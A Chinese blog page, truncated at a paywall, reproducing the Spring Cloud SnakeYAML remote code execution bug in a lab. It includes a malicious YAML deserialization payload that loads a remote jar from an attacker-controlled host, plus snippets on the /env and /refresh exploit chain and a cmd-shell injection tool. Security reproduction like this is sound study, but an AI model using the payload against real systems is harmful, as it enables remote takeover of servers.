spring cloud SnakeYAML RCE

最新推荐文章于 2025-03-21 21:01:18 发布
最新推荐文章于 2025-03-21 21:01:18 发布
阅读量1k 收藏 1
点赞数
分类专栏: 代码审计 java安全 文章标签: spring cloud spring boot 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53264525/article/details/121800851
版权
本文详细分析了Spring Cloud中SnakeYAML远程代码执行(RCE)漏洞的原理,包括如何通过env接口改变服务器环境变量,以及利用refresh接口更新配置触发漏洞。复现过程中提到了利用特定的jar文件和yml文件,通过反序列化操作执行恶意代码。漏洞利用存在版本限制,主要影响Spring Boot 1.5.x的某些版本和1.4及以下版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

spring cloud SnakeYAML RCE

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce

IDEA打开然后配置一个Spring Boot即可

漏洞复现:

  1. python3 -m http.server 80 在 VPS 上开一个简单的 WEB 服务

  2. 编写一个 example.yml 文件,上传到 VPS 根目录

    !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://192.168.43.141/example.jar"]
  ]]
]

  3. https://github.com/artsploit/yaml-payload 下载下来,用如下命令生成 example.jar 文件,把 jar 文件上传到 VPS 根目录(我这里把AwesomeScriptEngineFactory.java 文件里的命令执行改为弹计算机,方便测试)

    javac src/
最低0.47元/天 解锁文章
网络安全 | Java代码审计】利用 Spring Boot Actuators 漏洞
等风来
11-20 3391
Spring Boot 框架内置了多个用于监控和管理应用程序的Actuator功能。这些功能可以帮助开发者执行审计、健康检查以及收集系统指标。然而,如果配置不当,Actuators 端点可能成为攻击者利用的“后门”,从而暴露敏感信息或使应用程序处于攻击者控制之下。
yaml-payload:Spring Cloud SnakeYAML反序列化一键注入cmdshell和reGeorg
03-13
自述文件 Spring Cloud SnakeYAML一键注册cmd shell和reGeorg 利用条件: 可以POST请求目标网站的/env接口设置属性 可以POST请求目标网站的/refresh接口刷新配置(存在spring-boot-starter-actuator依赖) 目标依赖的spring-cloud-starter版本<1.3.0.RELEASE 目标可以请求攻击者的HTTP服务器(请求可出外网) 仅在JDK1.8及Spring1.x测试通过,其他版本自测。 利用方法如下: 编译class文件然后打jar包 cd yaml-payload javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib javac src/artsploit/Tunnel.java -cp ./lib javac src/artsp
Springboot远程代码执行(spring cloud SnakeYAML RCE
qq_50854662的博客
06-27 1064
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
52-Java 开发者必知:SnakeYaml 反序列化与 SpringBoot 打包部署全攻略
最新发布
m0_70346880的博客
03-21 743
摘錄小迪安全
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
网络安全。
06-18 9138
0x01 漏洞原理 spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址 refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容 SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
spring cloud SnakeYAML RCE复现
qq_27862405的博客
05-30 2835
一、漏洞成因:   spring cloud在低版本下的 SnakeYAML 依赖组件存在反序列漏洞 二、漏洞复现 1、漏洞环境: 服务器:127.0.0.1 kali攻击机:192.168.174.130 下载漏洞环境: SpringBootVulExploit/repository/springcloud-snakeyaml-rce at master · LandGrey/SpringBootVulExploit · GitHub 2、在IEDA中打开下载好的项目(这里注意需要更.
spring cloud SnakeYAML RCE 漏洞复现
为之的博客
11-17 2622
漏洞成因 通过/env post提交数据以设置属性spring.cloud.bootstrap.location为外部恶意yml文件,再通过/refresh获取yml文件内容并解析导致漏洞。 debug过程 由于最后是通过/refresh请求导致的,故这次从refresh相关代码开始,在RefreshEndpoint类中,有这么一段代码: @ManagedOperation public String[] refresh() { Set<String> keys = t
Spring Boot 相关漏洞学习资源
11-05
对每个漏洞类型的阐述细致入微,例如在远程代码执行部分,针对多种可能导致 RCE 的情况,如 whitelabel error page SpEL RCEspring cloud SnakeYAML RCE 等,分别进行了深入讲解,包括各自独特的利用条件、步骤...
Spring Boot Actuator 漏洞复现合集
热门推荐
drnrrwfs的博客
06-12 1万+
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
SpringBoot启动报错:snakeyaml was not found
q1252320343的博客
01-09 1552
问题分析:snakeyaml 看名字和yaml文件相似,应该是关于加载和读取yaml文件的相关jar包出现了问题。
snakeyaml-1.28.jar中文-英文对照文档.zip
03-06
注:下文中的 *** 代表文件名中的组件名称。 # 包含: 中文-英文对照文档:【***-javadoc-API文档-中文(简体)-英语-对照版.zip】 jar包下载地址:【***.jar下载地址(官方地址+国内镜像地址).txt】 Maven依赖:【***.jar Maven依赖信息(可用于项目pom.xml).txt】 Gradle依赖:【***.jar Gradle依赖信息(可用于项目build.gradle).txt】 源代码下载地址:【***-sources.jar下载地址(官方地址+国内镜像地址).txt】 # 本文件关键字: 中文-英文对照文档,中英对照文档,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压 【***.jar中文文档.zip】,再解压其中的 【***-javadoc-API文档-中文(简体)版.zip】,双击 【index.html】 文件,即可用浏览器打开、进行查看。 # 特殊说明: ·本文档为人性化翻译,精心制作,请放心使用。 ·本文档为双语同时展示,一行原文、一行译文,可逐行对照,避免了原文/译文来回切换的麻烦; ·有原文可参照,不再担心翻译偏差误导; ·边学技术、边学英语。 ·只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; ·不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 # 温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件;
Spring YAML使用 完全指南
microlmj的专栏
09-04 3923
yaml: yaml是json的超集,用于指定分层配置的便捷格式。 Spring支持YAML使用了SnakeYAML的解析实现。 如果SnakeYAML配置在类路径,SpringApplication类自动支持yaml配置。 如使用Starters模式,它在spring-boot-starter的依赖里。 <dependency> <groupId>org....
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 5878
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
SnakeYaml反序列化
include_voidmain的博客
09-13 2706
SnakeYaml反序列化
YAML
it_man的专栏
12-16 3300
YAML是“另一种标记语言”的外语缩写[1]  (见前方参考资料原文内容);但为了强调这种语言以数据做为中心,而不是以置标语言为重点,而用返璞词重新命名。它是一种直观的能够被电脑识别的数据序列化格式,是一个可读性高并且容易被人类阅读,容易和脚本语言交互,用来表达资料序列的编程语言。它是类似于标准通用标记语言的子集XML的数据描述语言,语法比XML简单很多。诞生YAML参考了其他多种语言,包括:XM
前后端项目的入门
m0_74169252的博客
03-31 691
在网上找到的回答是:"expected '', but found ''" 这个错误表明YAML解析器期望在文件的开头找到一个文档开始标记(通常为一个换行符后跟三个连字符(---)或一个井号(#)),但它实际上找到了一个块映射开始标记(一个键值对的集合,如 { key: value })编者一开始随便选了一个文件夹,导致在下一步刷新maven,下载包的时候出现报错,无法下载的情况。修改完后如图创建所需要的数据库即可。
JAVA使用SnakeYAML解析与序列化YAML
m0_73311735的博客
08-18 2147
本文,我们将学习如何使用SnakeYAML库将YAML文档转换为Java对象,以及JAVA对象如何序列化为YAML文档。SnakeYAML提供了一种将文档解析为自定义类型的方法让我们定义一个Customer}复制代码复制代码复制代码我们还可以选择将自定义Java类型转储到输出流中。@Test!}复制代码生成内容会包含!!com.baeldung.snakeyaml.Customer,为了避免在输出文件中使用标签名,我们可以使用库提供的dumpAs()方法。...
Java安全之SnakeYaml漏洞分析与利用
Yb528970805的博客
09-07 2399
SnakeYaml是Java中解析yaml的库,而yaml是一种人类可读的数据序列化语言,通常用于编写配置文件等。yaml基本语法大小写敏感使用缩进表示层级关系缩进只允许使用空格表示注释支持对象、数组、纯量这3种数据结构示例key:companies:id: 1id: 2意思是 companies 属性是一个数组,每一个数组元素又是由 id、name、price 三个属性构成YAML 入门教程 | 菜鸟教程SnakeYaml库。
springcloudgateway-rce
02-22
Spring Cloud Gateway是一个基于Spring Framework 5,Spring Boot 2和Project Reactor的API网关,它提供了一种简单而有效的方式来路由请求、过滤请求以及对请求进行转换。然而,Spring Cloud Gateway在某些情况下可能存在远程代码执行(RCE)的安全漏洞。 具体来说,该漏洞是由于Spring Cloud Gateway在处理请求时未正确验证请求头中的特定字段,导致攻击者可以构造恶意请求并执行任意代码。攻击者可以通过在请求头中添加特定的字段来触发RCE漏洞,并在目标系统上执行任意命令。 为了防止这种漏洞的利用,建议及时更新Spring Cloud Gateway的版本,以修复已知的安全问题。同时,还应该遵循安全最佳实践,如限制对网关的访问权限、使用安全的认证和授权机制等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值